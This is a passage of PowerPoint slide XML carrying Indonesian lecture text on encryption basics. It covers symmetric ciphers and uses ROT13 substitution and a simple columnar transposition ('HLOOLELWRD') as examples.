            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>algoritma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hashing dan dua </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>simetris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>asimetris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>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35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3923757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Enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Simetris</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Algoritma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengkodekan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditransmisikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemudian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didekripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemiliknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penerima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dituju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dekripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh orang yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berwenang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Algoritma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Substitusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Transposisi</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memahami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagaimana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>algoritma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bekerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kita</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempertimbangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>algoritma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>substitusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>transposisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sederhana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cipher </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>substitusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggantian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karakter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>blok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada plaintext </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ciphertext yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Cipher </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>substitusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sederhana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merotasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengacak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>huruf-huruf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alfabet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, ROT13 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merotasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>huruf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebanyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 13 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tempat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> N, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ciphertext "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Uryyb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Jbeyq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didekripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> plaintext "Hello World".</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cipher </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>substitusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, unit-unit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cipher </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>transposisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>plainteks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cipherteks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>urutannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diubah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>suatu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mekanisme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pertimbangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagaimana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ciphertext "HLOOLELWRD" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dihasilkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>H L O </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> L </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>E L W R D</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Huruf-huruf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditulis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kolom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemudian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> baris-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>barisnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digabungkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ciphertext.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Algoritma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> modern </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>substitusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>transposisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rumit</a:t>
            </a:r>
            <a:r>
